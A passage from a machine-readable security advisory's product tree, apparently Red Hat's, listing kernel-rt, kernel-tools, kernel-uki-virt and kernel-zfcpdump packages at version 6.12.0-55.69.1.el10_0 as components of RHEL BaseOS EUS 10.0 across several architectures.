"name": "kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
